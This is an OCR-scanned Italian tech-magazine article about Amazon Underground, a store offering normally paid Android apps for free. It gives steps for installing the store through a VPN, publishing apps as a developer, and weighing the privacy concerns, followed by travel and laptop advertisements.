Abbiamo testato in anteprima il nuovo store Amazon dal 

quale poter scaricare gratis anche le app a pagamento 


Fai incetta di app 
a costo zero 


Cosa ci 
occorre 

APP ANDROID 

AMAZON 

UNDERGROUND 

Quanto costa: Gratuita 
Sito Internet: 

https://amazon.com/ 

underground 


D ecine di migliaia di app improvvisamen¬ 
te gratuite: Amazon mette a segno un 
altro piccolo colpo nel mondo della In¬ 
ternet Economy. La compagnia di Seattle che 
ha rivoluzionato l'e-commerce, infatti, sferra un 
gancio nel settore della telefonia mobile colpen¬ 
do nientemeno che il Google Play Store! Il servi¬ 
zio concorrente messo a disposizione da Ama¬ 
zon, ovvero lAmazon App Store, viene affianca¬ 
to dalla trovata, probabilmente rivoluzionaria, 
Amazon Underground. Di cosa si tratta? Sem¬ 
plice: Amazon Underground, al momento atti¬ 
vo solo in USA, Francia, Regno Unito, Germania 
e presto anche in Italia, è uno store on-line che 


permette di scaricare gratuitamente moltissi¬ 
me app che normalmente sarebbero a paga¬ 
mento. Per far questo, sfrutta un accordo con 
gli sviluppatori, i quali accettano di essere pa¬ 
gati da Amazon stesso in base ai minuti di uti¬ 
lizzo delle loro app. 

I vantaggi per gli utenti... 

È un po' come applicare la logica dello stre¬ 
aming (pensiamo a Spotify o Deezer) al mer¬ 
canto delle app mobile. L'autore non ven¬ 
de direttamente al fruitore, ma affida ad un 
servizio che propone il tutto al cliente sen¬ 
za costi, e si ripaga con la pubblicità. È un 


processo che oramai, nel mondo della comu¬ 
nicazione, possiamo definire naturale: così 
come il passaggio dalla TV a canone alla TV 
commerciale, dal noleggio dei film ai servi¬ 
zi streaming tipo Netflix, e dall'acquisto dei 
dischi al già citato music streaming alla Spo¬ 
tify, quella di Amazon sarà probabilmente la 
mossa che, almeno nelle intenzioni, cerche¬ 
rà di cambiare il sistema economico in cui 
si muove, tutto a vantaggio del cliente-fru¬ 
itore. Scaricare un'app da Amazon Under¬ 
ground è sempre gratuito! Come vedremo 
nell'articolo, bisogna recarsi sul sito da un di¬ 
spositivo mobile e inserire la propria e-mail 


Entriamo nel nuovo app store 

Ecco come installare Amazon Underground sul nostro dispositivo portatile anche se non è ancora disponibile 
in Italia. Il trucco sta nell’utilizzare una rete VPN creata con l’app TunnelBear VPN. 



^ Installazione su misura 

Dopo aver creato la VPN, andiamo su www. 
amazon.com/underground dallo smartphone 
e tappiamo Download Amazon Underground per 
scaricare l’APK dell’app. Lo smartphone ci informa 
che l’installazione è bloccata: tappiamo Impostazioni 
e attiviamo l’opzione Origini sconosciute. 


© *7 .<ll 1 12:40 pm 


underground 


Sign in to your account 

View your wish list 

Find & reorder past purchases 


^ Creiamo un nuovo account 

Completiamo l’installazione e diamo le auto¬ 
rizzazioni per avviare l’app. Ci verrà chiesto di 
creare un account Amazon. Se ne abbiamo già uno, 
tappiamo Sign Ine d effettuiamo l’accesso, altrimen¬ 
ti creiamolo con Create an account. inseriamo le 
nostre credenziali e scegliamo una password. 



Un negozio alternativo 

Finalmente possiamo entrare nello store 
“underground". Tappiamo su Your account 
per personalizzare il profilo. Al termine, possiamo ini¬ 
ziare a cercare le app che ci interessano sfruttando 
l’apposito campo di ricerca indicato dalla lente di 
ingrandimento e scaricandole accedendo al carrello. 
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LE MIGLIORI APP CHE TROVI SU AMAZON UNDERGROUND 

Ecco una piccola panoramica dell'offerta disponibile sullo store alternativo per quanto 
riguarda le app che altrove sono disponibili solo a pagamento. 

MSECURE PASSWORD MANAGER 

Un manager per la sicurezza del nostro dispositivo tra i più potenti sul mercato. La nostra 
password non viene conservata da nessuna parte sul dispositivo. Le funzioni Auto Lock e 
Password Generator fanno di mSecure Password Manager un software di protezione a prova 
di spia. Infatti c'è anche l'opzione autodistruzione del telefono: se non è da 007 questo! 

OFFICE SUITE PRO 8 

Un clone di Microsoft Office con tutte le funzionalità e tutto il bundle bello e pronto sul 
nostro dispositivo portatile. La versione PRO 8 non ci farà rimpiangere il nostro computer. 
Legge tutti i principali formati, esporta e importa PDF, foto, eccetera. C'è anche Excel. Cosa 
vogliamo di più? Fondamentalmente, è come portarsi l'ufficio nella tasca dei pantaloni. 

I GIOCHI 

Sono tantissimi, dal famoso Goat Simulator (un folle "simulatore di capra"che riscuote 
successi tra gli amanti del videoludico) ai prodotti Disney come DuckTales Remastered 
e Mickey Mouse: Castle of lllusion. La scelta dei giochi su Amazon Underground è 
probabilmente finora la più ampia. Consigliati per le lunghe attese dal dottore e sul treno. 

, PHOTOGRAPHY APP 

Subito dopo i videogame, le app fotografiche seguono a ruota in quanto a popolarità. 
Troviamo Photo Suite Pro 4, che è uno dei più completi per dispositivi mobili: Camera Zoom 
FX Premium, diverse volte "app dell'anno" su App Store e altri. Oppure il programma di 
i fotoritocco Perfectly Clear, vincitore del 2015 Hot One Award. Gratis e a portata di clic! 



per ricevere un link al download. Dopodi¬ 
ché funziona esattamente come l'App Sto¬ 
re e il Play Store: si entra, si esplora e si sca¬ 
ricano le app gratuitamente (e stiamo par¬ 
lando di software che altrimenti arrivavano 
a costare anche 60 dollari). Non solo le app 
sono gratuite, ma anche gli aggiornamen¬ 
ti e i cosiddetti in-app purchases. Vengono 
evitate anche le micro-transactions, insom¬ 
ma tutti quei modi in cui, durante l'utilizzo di 
un'app, a volte ci si trova a dover pagare per 
sbloccare contenuti e funzionalità. 

... e per gli sviluppatori 

Gli sviluppatori, a loro volta, possono informar¬ 
si circa i requisiti che la loro app deve avere per 
essere "listed" su Amazon Underground, dal¬ 
la pagina informativa www.winmagazine.it/ 
link/3254. In genere tutte le app sono candi¬ 
dabili per entrare nella famiglia Underground 
e possono anche "migrare" da App Store e al¬ 
tri servizi. In particolare, il sito offre anche un 
comodo sistema per calcolare una stima ef¬ 
fettiva del profitto dell'app, in base all'utiliz- 
zo medio giornaliero nei mesi precedenti alla 
messa on-line sul servizio. Il report dei minuti 
di utilizzo viene raccolto dal software stesso 
sul telefonino e consegnato ad Amazon ap¬ 
pena lo stesso si connette ad Internet, quin¬ 
di lavora anche "off-line". Esistono già, come 


prevedibile, dei sistemi e dei "tricks" per au¬ 
mentare il numero di minuti di utilizzo della 
propria app: questo potrebbe portare ad una 
serie di peggioramenti, nel lungo termine, 
per quanto riguarda la fruibilità dei software 


stessi, che potrebbero letteralmente diventa¬ 
re più lenti e farraginosi per ragioni di profit¬ 
to. Sono tanti effettivamente i prò e i contro 
di questo tipo di operazioni, che sono sem¬ 
pre una scommessa. 



APP, LIBRI, FILM, AUDIO: È INIZIATA L'ERA DELLO STREAMING 


Amazon Underground è solo l'ultimo 
di tutta una nuova generazione di 
servizi che mirano a rendere i con¬ 
tenuti "volatili". Un suo predecesso¬ 
re all'interno della stessa azienda è 
stato Kindie Unlimited, un servizio a 
pagamento che permette, con 9,99 
dollari al mese, di avere 


accesso a più di diecimila libri on- 
line in lingua inglese e francese. Gli 
autori vengono retribuiti in base 
al numero di pagine che il lettore 
effettivamente visualizza. È fon¬ 
damentalmente un "eBook Rental 
Service" (cioè un servizio di noleg¬ 
gio dei libri elettronici), considerato 
i lo Spotify dei libri. Lo 
stesso Spotify è stato di 
certo uno dei predeces¬ 
sori nell'attuale questa 
politica del "contenuto 
volatile", se 
così voglia¬ 


mo chiamarla. Insieme a Netflix per 
i film e ad altri servizi tipo Google 
Play, Deezer, Tidal, YouTube Music, 
Amazon Prime Music e altri per la 
musica. Di servizi per lo streaming 
se ne aggiungono quasi ogni mese 
in tutto il mondo. Sono servizi che 
mirano ad abolire completamente 
il concetto di acquisto del prodotto 
cercando di debellare una volta per 
sempre la piaga della pirateria infor¬ 
matica. Funzionano? È ancora presto 
per dirlo. Quelli musicali, ovvero i 
pionieri, Spotify su tutti, hanno tan¬ 
tissimi utilizzatori ma anche la loro 


buona dose di detrattori, soprattutto 
tra i musicisti e le etichette discogra¬ 
fiche. Alcuni famosi musicisti, come 
Taylor Swift, hanno deciso di ritirare i 
loro album da Spotify perché effetti¬ 
vamente i guadagni (le cosiddette re- 
venues, per usare un gergo tecnico) 
sono estremamente ridotte e a volte 
un artista si vede accreditare 0,001 
€ ogni venti o trenta ascolti. Non 
esattamente musica 
"commerciale"! 
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O Così fa Thacker 


Fai da te | Fai incetta di app a costo zero 


Così pubblichiamo le nostre app 

Siamo sviluppatori o semplici appassionati a cui piace smanettare con i dispositivi mobile? Ecco come fare per 
pubblicare le nostre applicazioni su Amazon Underground ed avere anche una stima dei profitti. 



-x La pagina principale 

Sul nostro computer avviamo il browser prede- 
finito e colleghiamoci alla home page del sito 
Amazon dedicato agli sviluppatori: www.winmagazine. 
it/link/3255. Qui possiamo trovare i link a tutti i pas¬ 
saggi che ci servono. Nella sezione Getting Started 
clicchiamo here in Prepare YourApp. 




-x Serve il certificato d’idoneità 

Qui troviamo tutta la documentazione necessa¬ 
ria per verificare se la nostra applicazioni avrà 
le chance di essere accettata dal servizio. Se abbia¬ 
mo già pubblicato l’app su un altro store, possiamo 
"importarla” in Amazon Underground semplicemente 
cliccando su Migration Requirements. 




-x Creiamo raccount 

Se la nostra app, invece, è “originale”, tornia¬ 
mo alla pagina iniziale e clicchiamo su Regi- 
sterì n RegisterforFree : verremo rimandati al form di 
autenticazione dove potremo creare il nostro account 
con / am a new customero usare quello che già 
abbiamo cliccando / am a returning customer. 
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x Prendiamo accordi 

^ Compiliamo in ogni sua parte il modulo per 
la registrazione, indicando anche una breve 
descrizione dello sviluppatore (Developer description) 
o della software house sviluppatrice. La sezione ci dà 
anche tutte le informazioni sui pagamenti e ci chiederà 
di caricare la nostra app in formato APK. 


x. Testiamo ia nostra app 

Terminata la procedura di registrazione del 
nostro account e della nostra app, possiamo 
testarla sfruttando l’ambiente simulato messo a dispo¬ 
sizione da Amazon Underground. Dalla pagina del test 
clicchiamo Start Testinge carichiamo la nostra app in 
formato APK cliccando Browse. 


x Diventerò ricco? 

Se l'app supera il vaglio di Amazon, possia¬ 
mo verificare quanto potrà renderci in termini 
monetari. Per farlo, possiamo utilizzare il simulatore 
disponibile su www.winmagazine.it/link/3256: inse¬ 
rendo i dati sugli utilizzi ottenuti dal test del passo pre¬ 
cedente, vedremo la nostra stima di guadagno. 


LA PRIVACY, QUESTA SCONOSCIUTA 

Nella foto del box possiamo vedere il form 
della privacy"incriminato"che sta facendo 
discutere e storcere il naso a centinaia di 
utilizzatori: come possiamo vedere, Amazon 
richiede di accettare tutti i tipi di permessi 
possibili in una volta sola, inclusi quelli più 
ambigui come inviare SMS, cambiare la 
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proprietà dell'account, registrare audio 
ecc. Di base sembrerebbe essere sempli¬ 
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cemente una accettazione preventiva re¬ 
lativa alle app che andremo a scaricare e 
ai loro vari utilizzi: però è anche vero che, 
di fatto, stiamo firmando un contratto che 
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permette ad Amazon di fare tutte queste 
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cose a nome nostro... 




Come provare il servizio 
in anteprima 

Al momento in cui scriviamo, Amazon Un¬ 
derground non è ancora attivo in Italia, ma 
c'è un modo per provare il servizio in ante¬ 
prima. Basta infatti installare sul nostro di¬ 
spositivo mobile l'appTunnelBearVPN (di¬ 
sponibile sia per Android sia per iOS) che 
permette di attivare una particolare rete 
VPN (Virtual Private Network) veicolando 
attraverso di essa tutto il traffico in tran¬ 
sito sul dispositivo Android. In particola¬ 
re, la VPN consente di collegarsi ai server 
remoti (nel nostro caso quelli di Amazon 
Underground) con un indirizzo IP non ita¬ 
liano superando di fatto eventuali blocchi 
geografici. 
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Sei un 

e vuoi promuovere la tua 
struttura sul TrovaViaggi? 


Fai conoscere la tua attività a 
più di 10 milioni di viaggiatori! 

Collegati a www.trovaviaggi.it 

Clicca sul box "Scopri il TrovaViaggi" 
Segui le istruzioni e... in pochi click 
la tua struttura sarà online! 


Il TrovaViaggi di jristipercaso.i è sempre più ricco e ti offre la 
possibilità di organizzare i tuoi viaggi scegliendo tra le migliori 
Offerte Specia e ast Minute proposte da Agenzie, Tour 

Operator, Hotel, B&B e Agriturismi. 


Turimi 


Migliaia di offerte di qualità 
a prezzi imbattibili ti aspettano! 

Scoprile su www.trovaviaggi.it 


Voglia di vacanza? 

vai su TrovaViaggi.it! 



ASUS consiglia Windows. 



ASUS ROG GL552 è un notebook che grazie al processore Intel® Core™ i7, alla scheda grafica NVIDIA GTX960, al display Full HD IPS ed 
al sistema operativo Windows 10, è in grado di esprimere prestazioni superlative. Il suo look dinamico e aggressivo si ispira al design 
del cacciabombardiere F-22 Raptor ed è pensato per i veri professionisti del gaming: scocca con inserto in alluminio spazzolato, tasti 
retroilluminati di rosso intenso con corsa di soli 1,8 millimetri, tutto è stato ben progettato per un’esperienza di utilizzo veramente unica. Lo 
Storage combinato SSD con HDD garantisce un’elevata velocità di accesso ai dati ed un’ampia capacità di archiviazione, mentre l’esclusivo 
software GameFirst III ottimizza la connettività per giocare davvero senza limiti. 



AFFIDABILITÀ 

GARANTITA 


Un notebook ASUS è un investimento sicuro! In caso 
di guasti entro i primi 12 mesi sarà riparato gratuitamente 
e riceverai un indennizzo pari al prezzo di acquisto. 

Per tutti i dettagli visita: www.latuagaranzia.com 

Valida per acquisti entro il 31/12/2015 


Segui ASUS Italia G@©®0® 
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